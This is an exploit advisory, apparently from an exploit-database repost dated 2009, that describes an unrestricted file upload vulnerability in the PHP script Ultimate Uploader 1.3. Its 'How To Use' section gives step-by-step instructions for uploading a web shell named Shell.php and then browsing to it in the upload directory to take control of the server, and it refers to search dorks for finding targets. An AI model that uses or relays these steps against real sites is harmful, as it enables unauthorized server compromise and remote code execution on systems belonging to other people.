id: 10357
date: 12/21/2009
title: Ultimate Uploader 1.3 Remote File Upload Vulnerability
author: Master Mind
cves: 

======================================================
Ultimate Uploader 1.3 Remote File Upload Vulnerability
======================================================

==========================================================================
 
~ Script Name : Ultimate Uploader 1.3
~ Language : php
============================================================
 
Dork : Sorry , I can't do everything for you :(
 
How To Use :
http://server/script path/
 
upload your shell  : Shell.php (Or any extension you want)
 
Shell Path
http://server/script path/upload/Shell.php
 
:)
 
#############################################################################



#  0day.today [2023-03-21]  #